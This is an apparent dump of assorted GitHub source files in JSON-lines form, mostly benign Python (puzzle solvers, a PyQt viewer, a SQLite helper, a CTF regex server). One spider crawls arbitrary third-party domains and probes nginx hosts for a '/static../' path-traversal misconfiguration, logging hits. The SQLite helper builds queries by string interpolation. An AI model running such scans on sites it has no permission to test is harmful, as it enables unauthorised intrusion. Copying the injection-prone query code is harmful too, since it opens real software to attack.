\"\"\"\n :param list data: the data to operate on\n \n :return : the result\n \"\"\"\n self.phases = [0, 1, 2, 3, 4]\n\n if not data:\n data = self.processed\n\n phaseOrderPermutations = itertools.permutations(self.phases, len(self.phases))\n\n results = []\n\n for phaseOrder in phaseOrderPermutations:\n amplifiers = self._initializeAmplifiers(data)\n results.append(self.testPhaseOrder(amplifiers, list(phaseOrder)))\n\n return max(results)\n\n def SolvePartTwo(self, data=None):\n \"\"\"\n :param list data: the data to operate on\n \n :return : the result\n \"\"\"\n self.phases = [5, 6, 7, 8, 9]\n\n if not data:\n data = self.processed\n\n phaseOrderPermutations = itertools.permutations(self.phases, len(self.phases))\n\n results = []\n\n for phaseOrder in phaseOrderPermutations:\n amplifiers = self._initializeAmplifiers(data, amplifierClass=Day07ConcurrentComputer)\n 
results.append(self.testPhaseOrderConcurrent(amplifiers, list(phaseOrder)))\n\n return max(results)\n\n\ndef Main():\n solver = DaySolver07()\n solver.Run()\n\n\nif __name__ == '__main__':\n Main()\n","repo_name":"ozzmeister00/AdventOfCode2019","sub_path":"day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":8612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"18330089430","text":"from functools import wraps\nimport time\nfrom typing import Callable, Tuple, Dict\n\n\ndef elapsed_time(f: Callable):\n @wraps\n def wrapper(*args, **kargs):\n st = time.time()\n v = f(*args, **kargs)\n print(f\"{f.__name__} {time.time()-st}\")\n return v\n return wrapper\n\n\n@elapsed_time\ndef normal_pow(x: float, n: int) -> float:\n p = x\n for _ in range(n):\n p *= x\n return p\n\n\n@elapsed_time\ndef dp_pow(x: float, n: int) -> float:\n \"\"\"\n calculate exponationation of x with dynamic programing ,which require O(log(n)) time\n Parameters\n ----------\n x : float\n [description]\n n : int\n [description]\n\n Returns\n -------\n float\n [description]\n \"\"\"\n\n if n == 1:\n return x\n if n % 2 == 0:\n p = dp_pow(x, n/2)\n return p*p\n else:\n p = dp_pow(x, (n-1)/2)\n return x*p*p\n\n\nif __name__ == \"__main__\":\n import time\n st = time.time()\n normal_pow(4, 100000)\n print(time.time()-st)\n st = time.time()\n dp_pow(4, 100000)\n print(time.time()-st)\n # 500 times faster than normal pow\n","repo_name":"owari-taro/python_algorithm","sub_path":"algirthm_and_data_structure/chap8_algorithm_design/dp_pow.py","file_name":"dp_pow.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31288083046","text":"import re\nfrom datetime import datetime\n\nimport pdfminer.high_level\n\nimport categories\nfrom mail_api.abstract_mail_api import AbstractAttachment\nfrom message_handler import MessageHandler\nfrom utils import temporary_locale\n\n\nclass MoisesMessageHandler(MessageHandler):\n def get_type(self):\n return categories.COMPUTER_SOFTWARE\n\n def get_query_params(self):\n return {\n self.SUBJECT: \"Your receipt from Moises Systems, Inc.\",\n self.SENDER: \"Moises Systems, Inc.\",\n }\n\n def extract_txt(self, pdffile: str):\n text = pdfminer.high_level.extract_text(pdffile)\n purchase_date = re.findall(r\"([A-Za-z]+ \\d+, \\d{4})\", text)[0]\n with temporary_locale(\n \"en_US\"\n ): # required for parsing the date with English month names\n self.purchase_date = datetime.strptime(purchase_date, \"%B %d, %Y\")\n self.amount = float(\n re.findall(r\"Amount paid.*\\$(\\d+\\.\\d+)\", text, re.DOTALL)[0]\n )\n self.my_currency = \"USD\"\n\n def handle_attachment(self, attachment: AbstractAttachment):\n if re.search(r\"Invoice-\", attachment.get_filename()):\n return True\n pdffile: str = self.save(attachment)\n self.filename = attachment.get_filename()\n self.extract_txt(pdffile)\n","repo_name":"bwagner/gi","sub_path":"plugins/moises_message_handler.py","file_name":"moises_message_handler.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31433582456","text":"from urllib.parse import urlparse\n\nimport requests\nimport scrapy\n\n\nclass GitSpider(scrapy.Spider):\n name = 'NginxStaticSpider'\n\n allowed_schemes = [\n 'http',\n 'https'\n ]\n\n disallowed_tlds = [\n 'com',\n 'net'\n ]\n\n def __init__(self, **kwargs):\n super().__init__(self.name, **kwargs)\n\n if not hasattr(self, 'url'):\n raise Exception('No url argument provided!')\n\n starting_url = self.url\n\n if not starting_url.startswith('http://') and not starting_url.startswith('https://'):\n starting_url = 'https://' + starting_url\n\n print('Starting url: %s' % starting_url)\n\n self.start_urls = ['%s' % starting_url]\n\n def parse(self, response):\n # print('Response URL: %s' % response.url)\n\n parsed_root_url = urlparse(response.url)\n\n self.check_for_vulnerability('%s://%s' % (parsed_root_url.scheme, parsed_root_url.netloc), response.headers)\n\n for url in response.xpath('//a/@href').extract():\n parsed_url = urlparse(url)\n\n if len(parsed_url.scheme) == 0 or len(parsed_url.netloc) == 0:\n continue\n\n if parsed_root_url.netloc is parsed_url.netloc:\n continue\n\n if parsed_url.scheme not in self.allowed_schemes:\n continue\n\n domain = parsed_url.netloc\n domains = domain.split('.')\n\n tld = domains[len(domains) - 1]\n\n if tld in self.disallowed_tlds:\n continue\n\n if len(domains) != 2:\n domain = '%s.%s' % (domains[len(domains) - 2], domains[len(domains) - 1])\n\n url = '%s://%s' % (parsed_url.scheme, domain)\n\n yield scrapy.Request(url, callback=self.parse)\n\n def check_for_vulnerability(self, url, headers):\n if not self.is_nginx(headers):\n return\n\n # response = requests.get('%s/static/' % url, verify=False)\n #\n # if response.status_code != 200:\n # if response.status_code != 404:\n # print('Response code wrong: %d %s' % (response.status_code, url))\n # return\n\n response = requests.get('%s/static../' % url, verify=False)\n\n if response.status_code == 403:\n print('[+] Possible found: %s' % url)\n self.log_possible_found(url, response)\n # else:\n # print('[-] Not found: %s' % url)\n\n @staticmethod\n def log_possible_found(url, response):\n f = open('out/found.txt', 'a+')\n f.write('%s\\n' % url)\n f.close()\n\n filename = 'out/%s' % url.replace(':', '_').replace('//', '')\n\n f = open(filename, 'w+')\n f.write(response.content.decode('UTF-8'))\n f.close()\n\n @staticmethod\n def is_nginx(headers):\n server = None\n\n if 'Server' in headers:\n server = headers['Server']\n elif 'server' in headers:\n server = headers['server']\n\n # it can be false positive\n if server is None:\n return True\n\n server = server.decode('utf-8').lower()\n\n return 'nginx' in server","repo_name":"adamtorok96/NginxStaticSpider","sub_path":"NginxStaticSpider.py","file_name":"NginxStaticSpider.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17823966052","text":"import discrete_minmax\nimport math\n\ndef getError(result):\n iterations = len(result)\n error = result[str(iterations)][\"max_error\"]\n return abs(error)\n\n\ndef shrinkInterval(interval, history = []):\n [start, end] = interval\n\n if end - start == 1:\n return [start, end]\n\n if (start > end):\n print('Beginning of interval is greater than its end')\n return\n left_boundaries = sorted(filter(lambda x: x < end, map(lambda x: x[1], history)))\n if len(left_boundaries) > 0:\n nearest_left_neighbor = left_boundaries[-1]\n delta = math.ceil((end - nearest_left_neighbor) / 2.0)\n return [int(start), int(end - delta)]\n else:\n mid = math.ceil((end - start) / 2.0)\n return [int(start), int(start + mid)]\n\n\ndef expandInterval(interval, history):\n [start, end] = interval\n if (start > end):\n print('Begining of interval is greater than its end')\n return\n if len(history) == 0:\n print('when expanding there should be history')\n return\n\n right_boundaries = sorted(filter(lambda x: x > end, map(lambda x: x[1], history)))\n if len(right_boundaries) > 0:\n nearest_right_neighbor = right_boundaries[0]\n delta = math.ceil((nearest_right_neighbor - end) / 2.0)\n return [int(start), int(end + delta)]\n\n\ndef main(X, Y, deg, pinnedPoints, allowed_error, *args):\n # return discrete_minmax.main(X, Y, deg, pinnedPoints)\n\n interval = [0, len(X) - 1]\n historyOfIntervals = []\n splines = []\n\n def approximateMinmax(interval):\n if type(interval) is list:\n [start, end] = interval\n x_shrinked = X[start:end+1]\n y_shrinked = Y[start:end + 1]\n return discrete_minmax.main(x_shrinked, y_shrinked, deg, pinnedPoints)\n\n approximate = args[0] if len(args) > 0 else approximateMinmax\n\n def make_approximation_on_one_segment(overallInterval):\n print('overallInterval')\n print(overallInterval)\n if not type(overallInterval) is list:\n print(overallInterval)\n return\n result = approximate(overallInterval)\n max_error = getError(result)\n\n condition = abs(abs(max_error) - allowed_error)\n points = overallInterval[-1] - overallInterval[0] + 1\n\n if condition > (allowed_error / 10) and points > deg + 2: # WHY 10 ????\n\n if (max_error > allowed_error):\n shrinkedInterval = shrinkInterval(overallInterval, historyOfIntervals)\n if len(historyOfIntervals) == 0:\n historyOfIntervals.append(overallInterval)\n historyOfIntervals.append(shrinkedInterval)\n make_approximation_on_one_segment(shrinkedInterval)\n else:\n if overallInterval[1] != interval[1]:\n expandedInterval = expandInterval(overallInterval, historyOfIntervals)\n historyOfIntervals.append(expandedInterval)\n make_approximation_on_one_segment(expandedInterval)\n else:\n splines.append({\n \"interval\": overallInterval,\n \"spline\": result,\n \"max_error\": max_error\n })\n else:\n splines.append({\n \"interval\": overallInterval,\n \"spline\": result,\n \"max_error\": max_error\n })\n if overallInterval[1] < interval[1]:\n historyOfIntervals[:] = []\n make_approximation_on_one_segment([overallInterval[1], interval[1]])\n\n make_approximation_on_one_segment(interval)\n return splines\n\nX = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]\nY = [1.1, 0.9, 3.2, 4.5, 5.6, 6.7, 7.5, 8.4, 9.2, 10.2, 11.3, 12.4, 13.5, 14.1]\ndeg = 1\npinnedPoints = []\n\n\n# print(len(main(X, Y, deg, pinnedPoints, 0.2)))\n# mid_index = int(math.floor(len(X) / 2.0))\n#\n#\n# print(mid_index)\n#\n#\n# left_X = X[:mid_index]\n# right_X = X[mid_index:]\n#\n# left_Y = Y[:mid_index]\n# right_Y = Y[mid_index:]\n\n# print(left_X)\n# 
print(right_X)\n\n# print(main(X, Y, deg, pinnedPoints)['1']['max_error'])\n\n# def getMaxError (X, Y, deg, pinnedPoints):\n# approx = main(X, Y, deg, pinnedPoints)\n# iterations = list(map(lambda x: int(x), approx.keys()))\n# last_index = max(iterations)\n# print(approx[str(last_index)]['max_error'])\n\n# getMaxError(X, Y, deg, pinnedPoints)\n#\n# getMaxError(left_X, left_Y, deg, pinnedPoints)\n#\n# getMaxError(right_X, right_Y, deg, pinnedPoints)\n#\n\n","repo_name":"blevantovych/Diplom","sub_path":"server/discrete_spline_minmax.py","file_name":"discrete_spline_minmax.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"40634964299","text":"d = dict()\ndef separador(a):\n b = a.split()\n return b[2]\n\ndef hola(manejador):\n\n for linea in manejador:\n if len(linea.split()) == 0 or linea.split()[0] != 'Received:':\n \n continue\n d[separador(linea)] = d.get(separador(linea),0)+1\n #print (linea)\n\n\nhola(open(\"actividad7/mbox-short.txt\"))\nprint(d)","repo_name":"idril150/mango","sub_path":"actividad8/ejercicio3.py","file_name":"ejercicio3.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"7472714242","text":"# Definition for singly-linked list.\r\n# class ListNode(object):\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution(object):\r\n def removeElements(self, head, val):\r\n \"\"\"\r\n :type head: ListNode\r\n :type val: int\r\n :rtype: ListNode\r\n \"\"\"\r\n ###first remove val if they exist in the start of the list\r\n ###then propogate\r\n if head==None:return head\r\n while head.val==val:\r\n head=head.next\r\n if head==None:return head\r\n p1=head;p2=p1.next\r\n while p2!=None:\r\n if p2.val==val:\r\n p2=p2.next\r\n p1.next=p2\r\n else:\r\n p1=p2;\r\n p2=p1.next\r\n return head","repo_name":"cclain/LeetCode-Problem-Solution","sub_path":"203. Remove Linked List Elements.py","file_name":"203. Remove Linked List Elements.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"8137321732","text":"#!/usr/local/bin/python3 -u\n\nimport re\nimport random\nfrom secret import FLAG\nimport zlib\nfrom base64 import b64decode\nimport sys\n\nHEADER = \"\"\"\n\n .___ __ /\\ __ .__ ._.\n | |/ |)/ ______ _____ _____ _____ _/ |_ ____ | |__| |\n | \\ __\\/ ___/ \\__ \\ / \\\\\\\\__ \\\\\\\\ __\\/ ___\\| | \\ |\n | || | \\___ \\ / __ \\_ | Y Y \\/ __ \\| | \\ \\___| Y \\|\n |___||__| /____ > (____ / |__|_| (____ /__| \\___ >___| /_\n \\/ \\/ \\/ \\/ \\/ \\/\\/\n\n\nPlease send me a regular expressions that matches strings of the form \"x*y+z=t\",\nwhere x, y, z and t are arbitrarily long binary numbers, and the regular expression\nmatches if and only if x*y + z = t mod 7 holds.\n\nFor example:\n- \"100*1111+101=1001\" should match because 4*15 + 5 = 9 (mod 7)\n- \"100*1111+101=100\" should not match because 4*15 + 5 != 4 (mod 7)\n\nTimeout is 120 seconds for all the tests, good luck!\n\"\"\"\nprint(HEADER)\n\ntry:\n r = zlib.decompress(b64decode(input('> '))).decode()\nexcept:\n print('An error occurred')\n exit(0)\n\nif '(?' in r:\n print('Please, do not use extensions! Only *regular* expressions are allowed.')\n exit(0)\n\nprint('Compiling...')\nr = re.compile(r)\n\np = 7\nTEST_SIZES = [4, 4, 6, 6, 8, 8, 12, 12, 16, 16, 32, 32, 64, 64]\nfor i, test_bits in enumerate(TEST_SIZES):\n x = random.randint(0, 2**test_bits)\n y = random.randint(0, 2**test_bits)\n z = random.randint(0, 2**test_bits)\n\n if i%2 == 0:\n # test matching\n t = random.randint(0, 2**test_bits) * p + ((x*y + z) % p)\n assert (x*y + z) % p == t % p\n expected_matches = True\n else:\n # test non matching\n t = random.randint(0, 2**test_bits) * p + ((x*y + z) % p) + random.randint(1, p-1)\n assert (x*y + z) % p != t % p\n expected_matches = False\n\n s = f'{bin(x)[2:]}*{bin(y)[2:]}+{bin(z)[2:]}={bin(t)[2:]}'\n\n print(f'[{i+1}/{len(TEST_SIZES)}] Testing the input \"{s}\"')\n \n matches = r.fullmatch(s) is not None\n if matches != expected_matches:\n print('Sorry, you need to match harder!')\n exit(0)\n\nprint('Congratulations! Here is the flag:', FLAG)\n\n","repo_name":"fibonhack/ifctf-2023-finals-challs","sub_path":"misc/its_a_match/src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"69"}
+{"seq_id":"73866823581","text":"import sys\nimport pandas as pd\nimport os\nimport sqlite3\nfrom django.conf import settings\nimport logging\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mysite.settings')\n\n\ndef create_logger():\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n FORMAT = '%(levelname)s %(asctime)s %(module)s %(lineno)d %(message)s'\n formatter = logging.Formatter(FORMAT)\n\n sh = logging.StreamHandler()\n sh.setFormatter(formatter)\n sh.setLevel(logging.DEBUG)\n\n fh = logging.FileHandler(os.path.join(settings.BASE_DIR, 'logger.log'))\n fh.setFormatter(formatter)\n fh.setLevel(logging.INFO)\n\n logger.addHandler(sh)\n logger.addHandler(fh)\n\n return logger\n\n\nlogger = create_logger()\n\n\nclass ConnectSqlite:\n def __init__(self, dbName=settings.BASE_DIR / 'db3_station.sqlite3'):\n '''\n 初始化连接\n :param dbName: 连接数据库的路径名\n '''\n\n self._conn = sqlite3.connect(dbName)\n self._cur = self._conn.cursor()\n self._time_now = '[' + sqlite3.datetime.datetime.now().strftime('%Y%m%d %H%M%S') + ']'\n\n def get_conn(self):\n return self._conn\n\n def get_cur(self):\n return self._cur\n\n def read_table(self, table_name):\n '''\n 读取表格数据\n :param table_name:\n :return: dataframe 格式数据\n '''\n sql = f'select * from {table_name}'\n df = pd.read_sql(sql, self._conn)\n return df\n\n def excel_to_table(self, read_excel_name, to_table_name, temp_folder=r\"static\\craft_temp_data\",\n header=0, index_col=None):\n # 设定读取数据源地址\n excel_path = os.path.join(settings.BASE_DIR, temp_folder, read_excel_name)\n # 读取EXCEL数据\n df1 = pd.read_excel(excel_path, header=header, index_col=index_col)\n # EXCEL数据写入数据库\n df1.to_sql(to_table_name, self._conn, if_exists='replace')\n\n def close_con(self):\n '''\n 关闭连接对象,主动调用\n :return:\n '''\n self._cur.close()\n self._conn.close()\n\n def create_table(self, sql):\n '''\n 创建表初始化\n :param sql: 建表语句\n :return: True is ok\n '''\n\n try:\n self._cur.execute(sql)\n self._conn.commit()\n return True\n except Exception as e:\n print(self._time_now, '[create table error]', e)\n return False\n\n def drop_table(self, table_name):\n '''\n 删除表\n :param table_name:表名\n :return:\n '''\n\n try:\n self._cur.execute(f'drop table {table_name}')\n self._conn.commit()\n return True\n except Exception as e:\n print(self._time_now, '[drop table error]', e)\n return False\n\n def delete_table(self, sql):\n '''\n 删除表记录\n :param sql:\n :return: True or False\n '''\n\n try:\n if 'delete' in sql.lower():\n self._cur.execute(sql)\n self._conn.commit()\n return True\n else:\n print(self._time_now, '[execute sql is not delete]')\n return False\n except Exception as e:\n print(self._time_now, '[delete table error]', e)\n return False\n\n def fetchall_table(self, sql, limit_flag=True):\n '''\n 查询所有数据\n :param sql:\n :param limit_flag: False 查询一条, True查询全部\n :return:\n '''\n\n try:\n self._cur.execute(sql)\n war_msg = self._time_now + f'The [{sql}] is empty or equal None!'\n if limit_flag is True:\n r = self._cur.fetchall()\n return r if len(r) > 0 else war_msg\n elif limit_flag is False:\n r = self._cur.fetchone()\n return r if len(r) > 0 else war_msg\n except Exception as e:\n print(self._time_now, '[select table error', e)\n\n @staticmethod\n def build_sql(table_name, data, operate='update'):\n '''\n 建立sql语句字符串\n :param table_name: 表格名称\n :param data: update-字典,delete-删除条件,insert-单行数据元组\n :param operate:update, delete, insert\n :return:\n '''\n\n def right_replace(string, old, new, max_counts=1):\n '''\n 字符串从右向左替换字符,并可以指定数量,重写原replace 函数\n :param string:\n :param old:\n 
:param new:\n :param max_counts:\n :return:\n '''\n return string[::-1].replace(old[::-1], new[::-1], max_counts)[::-1]\n\n data_dict = data\n if operate == 'update':\n update_table = f' update {table_name} '\n\n set_col = f'set '\n for key, value in data_dict.items():\n set_col += f\" {key}='{value}', \" if key != 'index' else \" \"\n set_col = right_replace(set_col, \",\", \"\")\n\n where_condition = f\" where [index]='{data_dict['index']}' \"\n\n result_sql = update_table + set_col + where_condition\n elif operate == 'insert':\n insert_table = f\" insert into {table_name} \"\n\n cols_in = ''\n values_in = ''\n for (key, value) in data_dict.items():\n cols_in += f'{key}, ' if key != 'index' else f' [{key}], '\n values_in += f'\"{value}\", ' if key != 'index' else f' (select count([index]) from {table_name}) + 1 , '\n cols_in = right_replace(cols_in, ',', '')\n values_in = right_replace(values_in, ',', '')\n cols = f\" ({cols_in}) \"\n values = f\" ({values_in}) \"\n\n result_sql = insert_table + cols + 'values ' + values\n\n elif operate == 'delete':\n pass\n else:\n raise #参数错误\n\n\n return result_sql\n\n def insert_update_table(self, sql):\n '''\n 插入更新表格记录\n :param sql:\n sql_insert = \"insert into linetoclass values('index06', 'line06', 'class06')\"\n sql_delete = \"delete from linetoclass where [index]='index04'\"\n sql_update = \"update linetoclass set 生产线='line05', 班组='class05' where [index]='index03'\"\n :return:\n '''\n\n try:\n self._cur.execute(sql)\n self._conn.commit()\n return True\n except Exception as e:\n print(self._time_now, '[insert/update table error:', e)\n return False\n\n def insert_table_many(self, sql, value):\n '''\n 插入多条记录\n :param sql: [(), ()]\n :param value:\n :return:\n '''\n\n try:\n self._cur.executemany(sql, value)\n self._conn.commit()\n return True\n except Exception as e:\n print(self._time_now, '[insert many table error')\n return False\n\n\ndef set_craft_global():\n '''\n 设定 craft app 应用级别的全局变量,在settings的 templates 配置 context—processes中注册该函数\n :param request:\n :return:\n '''\n db = ConnectSqlite()\n table_list_df = db.read_table('table_list_view')\n table_list_display = table_list_df[table_list_df['is_display'] == 1]['name'].to_list()\n\n station_df = db.read_table('station_view')\n station_name_dict = dict(zip(station_df['station'], station_df['工位名称']))\n\n station_list = station_df['station'].to_list()\n craft_global = {\n 'craft_table_list': table_list_df,\n 'craft_station_list': station_list,\n 'station_name_dict': station_name_dict,\n }\n\n return craft_global\n\n\ndef suffix_view(table_name):\n '''\n add suffix 'view' end with table_name.\n 在table_name后面增加 view 后缀名,用于调用数据库中view表格,实现原始数据与应用数据的解耦\n :param table_name:\n :return:\n '''\n\n return table_name + '_view'\n\n\n# db_station = ConnectSqlite()\nif __name__ == '__main__':\n db = ConnectSqlite()\n dt = {'index':'v1', 'k2':'v2', 'k3':'v3'}\n","repo_name":"angelyhch/station_sys","sub_path":"craft/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"33813570784","text":"alien_color = ['green', 'red', 'yellow']\nif 'green' in alien_color:\n\tprint('you just earned 5 points!')\n\nprint('\\n')\n\nalien_color = ['blue', 'orange', 'red', ] #this set ran through each item in the list\nfor color in alien_color:\n\tif color == 'blue':\n\t\tprint('\\nplayer earns 5 points!')\n\telse:\n\t\tprint('\\nyou just lost 589 points!')\n\nalien_colors = ['green', 'purple', 'yellow', 'brown']\nfor color in alien_colors:\n\n\tif color == 'green':\n\t\tprint(\"earned 5 points\")\n\telif color == 'purple':\n\t\tprint(\"earned 10 points\")\n\telif color == 'yellow':\n\t\tprint(\"earned 15 points\")\n\telse: \n\t\tprint(\"you need some color\")\n","repo_name":"DBerchelmann/python_crash_course","sub_path":"alien_colors.py","file_name":"alien_colors.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"12435102444","text":"import matplotlib.pyplot as plt\nimport matplotlib\nimport numpy as np\nfrom nd2reader import ND2Reader\nmatplotlib.use('Qt5Agg')\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas, NavigationToolbar2QT as NavigationToolbar\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import (QApplication, QMainWindow, QSlider, QPushButton, QHBoxLayout, QVBoxLayout, QWidget, QSizePolicy, QSpacerItem, QFileDialog, QLabel)\n\nfrom skimage import io\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n\t\n # Create the central widget and set it as the main window's central widget\n central_widget = QWidget(self)\n self.setCentralWidget(central_widget)\n\n # Create a button to trigger the file browser\n self.nd2_file_button = QPushButton(\"Select nd2 image\")\n self.nd2_file_button.clicked.connect(self.openFileBrowser)\n\n # Open the file browser at the beginning\n self.image_file,_ = QFileDialog.getOpenFileName(self,\"Select nd2 image\", \"\",\"ND2 Files (*.nd2)\")\n #self.openFileBrowser()\n self.f = ND2Reader(self.image_file)\n\n # Create the figure and the canvas for the image\n self.figure_image, self.ax_image = plt.subplots(constrained_layout=True)\n self.image = self.ax_image.imshow(np.zeros((100, 100)), clim=(0, 255))\n self.ax_image.set_xticklabels([])\n self.ax_image.tick_params(axis='x', which='both', bottom=False, top=False, labelbottom=False)\n self.canvas_image = FigureCanvas(self.figure_image)\n\n toolbar = NavigationToolbar(self.canvas_image, self)\n\n\n screen_height = QApplication.primaryScreen().geometry().height()\n\n self.canvas_image.setMinimumWidth(int(screen_height*0.7))\n\n\n # Create the figure and the canvas for the plot\n self.figure_plot, self.ax_plot = plt.subplots(constrained_layout=True)\n x, y = [1,2], [2, 3]\n self.plot, = self.ax_plot.plot(x, y)\n self.canvas_plot = FigureCanvas(self.figure_plot)\n\n # Create the sliders and buttons\n self.slider1 = QSlider(Qt.Horizontal)\n self.t_slider = QSlider(Qt.Horizontal)\n #self.t_slider.valueChanged.connect(self.update_nd2)\n self.button1 = QPushButton('Update Image', self)\n self.button2 = QPushButton('Update Plot', self)\n\n # Create a button to trigger the file browser\n self.nd2_file_button = QPushButton(\"Select nd2 image\")\n self.nd2_file_button.clicked.connect(self.openFileBrowser)\n \n # Create a vertical layout for the sliders and buttons\n vbox_left = QVBoxLayout()\n vbox_left.addWidget(self.slider1)\n #vbox_left.addWidget(self.slider2)\n vbox_left.addWidget(self.button1)\n vbox_left.addWidget(self.button2)\n vbox_left.addWidget(self.nd2_file_button)\n\n #Veritcal box for image and toolbar and t slider\n vbox_image = QVBoxLayout()\n vbox_image.addWidget(self.canvas_image)\n vbox_image.addWidget(toolbar)\n vbox_image.addWidget(self.t_slider)\n\n # Create a horizontal layout to split the main window into two columns\n hbox = QHBoxLayout()\n hbox.addLayout(vbox_left)\n hbox.addLayout(vbox_image, stretch=1)\n hbox.addWidget(self.canvas_plot, stretch=1)\n #hbox.addWidget(spacer, stretch=1)\n #hbox.addStretch(1)\n\n # Use a spacer to stretch the right column horizontally\n hbox.addSpacerItem(QSpacerItem(1, 1, QSizePolicy.Expanding, QSizePolicy.Minimum))\n\n # Add the horizontal layout to the central widget\n central_widget.setLayout(hbox)\n\n # Connect the buttons to their respective functions\n self.button1.clicked.connect(self.update_nd2)\n self.button2.clicked.connect(self.update_plot)\n \n \n def update_image(self):\n # Get the 
values of the sliders\n if 'image_file' in dir(self):\n print('hi')\n image = io.imread(self.image_file)\n self.image.set_data(image)\n self.canvas_image.draw()\n return\n \n slider1_value = self.slider2.value()\n #slider2_value = self.slider2.value()\n\n # Generate new image data based on the slider values\n new_data = generate_image_data(slider1_value)\n # Update the image data\n self.image.set_data(new_data)\n\n # Redraw the canvas\n self.canvas_image.draw()\n \n def update_nd2(self):\n\n #vmin, vmax = self.clip.value\n #clip=self.clip.value\n #t = self.t_slider.value\n #c =self.c.value\n #v=self.v.value\n #image = self.f.get_frame_2D(v=v,c=c,t=t)\n \n #self.im.set_data(image)\n #lanes = g.get_frame_2D(v=v)\n #self.im.set_clim([vmin, vmax])\n #self.fig.canvas.draw()\n \n # if v!=self.oldv:\n # self.cyto_locator=None\n # self.update_lanes()\n \n # if self.view_nuclei.value:\n # if v!=self.oldv:\n # self.load_df(self.db_path, v)\n # self.update_tracks()\n \n \n # if self.view_cellpose.value:\n # if v!=self.oldv:\n # self.load_masks(self.outpath, v)\n \n cyto = self.f.get_frame_2D(t=self.t_slider.value())\n self.image.set_data(cyto)\n\n # Redraw the canvas\n self.canvas_image.draw()\n #self.tmarker.set_xdata(t)\n \n #self.oldv=v\n\n def update_plot(self):\n # Get the values of the sliders\n slider1_value = self.slider1.value()\n slider2_value = self.slider2.value()\n\n # Generate new plot data based on the slider values\n x, y = generate_plot_data(slider1_value, slider2_value)\n\n # Update the plot data\n self.ax.lines[0].set_xdata(x)\n self.ax.lines[0].set_ydata(y)\n\n # Update the limits of the plot\n self.ax.relim()\n self.ax.autoscale()\n\n # Redraw the canvas\n self.canvas.draw()\n \n # Create a function to open the file browser when a button is clicked\n def openFileBrowser(self):\n options = QFileDialog.Options()\n options |= QFileDialog.ReadOnly\n fileName, _ = QFileDialog.getOpenFileName(self, \"Select a file\", \"\", \"All Files (*);;Text Files (*.txt)\", options=options)\n if fileName:\n self.image_file = fileName\n pass#self.label.setText(fileName)\n\ndef generate_image_data(slider1_value):\n \n image = np.ones((100, 100))*slider1_value\n #image = io.imread(self.image_file)\n return image\n\n \nif __name__ == '__main__':\n app = QApplication([])\n window = MainWindow()\n window.show()\n app.exec_()\n","repo_name":"miguelatienza/onedcelltrack","sub_path":"onedcelltrack/gui/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6707,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"29053801454","text":"#!/usr/bin/env python3\nimport latticex.rosetta as rtt\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nmnist = input_data.read_data_sets(\"../MNIST\", one_hot=True)\ntrain_x, train_y = mnist.train.next_batch(10)\n\nprint(\"shape train_x: {}, train_y: {}\".format(train_x.shape, train_y.shape))\nrtt.activate(\"SecureNN\")\nplaceholder_x = tf.placeholder(tf.float32, [None, train_x.shape[1]])\nplaceholder_y = tf.placeholder(tf.float32, [None, train_y.shape[1]])\nw = tf.Variable(\n initial_value=tf.ones(\n shape=train_x.shape,\n dtype=tf.float32\n ),\n dtype=tf.float32,\n name=\"w_{:04d}\".format(1)\n)\nprint(\"w.shape: {}\".format(w.shape))\nassign_w = tf.assign(w, w * placeholder_x)\n\nAlice = tf.Variable(rtt.private_input(0, np.array([1000, 2000, 3000])))\nBob = tf.Variable(rtt.private_input(1, [999, 1999, 3001]))\ntest = tf.Variable(np.array([2., 3., 4.]), dtype=tf.float32)\nconst_mul_share = test * Alice\nres = tf.greater(Alice, Bob)\nprint(\"alice.shape: {}, alice.dtype: {}, test.shape: {}, test.dtype: {}\".format(\n Alice.shape, Alice.dtype, test.shape, test.dtype))\nprint(\"alice: {}\\nbob: {} \\ntest: {}\\nres: {}\\nconst_mul_var: {}\".format(Alice, Bob, test, res, const_mul_share))\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n val_alice = sess.run(Alice)\n print(\"val_alice: {}\".format(val_alice))\n val_alice_plain = sess.run(rtt.SecureReveal(Alice))\n print(\"val_alice(plaintext): {}\".format(val_alice_plain))\n val_test = sess.run(test)\n print(\"val_test: {}\".format(val_test))\n val_const_mul_share = sess.run(const_mul_share)\n print(\"val_const_mul_share: {}\".format(val_const_mul_share))\n print(\"val_const_mul_share(plaintext): {}\".format(sess.run(rtt.SecureReveal(const_mul_share))))\n plain_res = 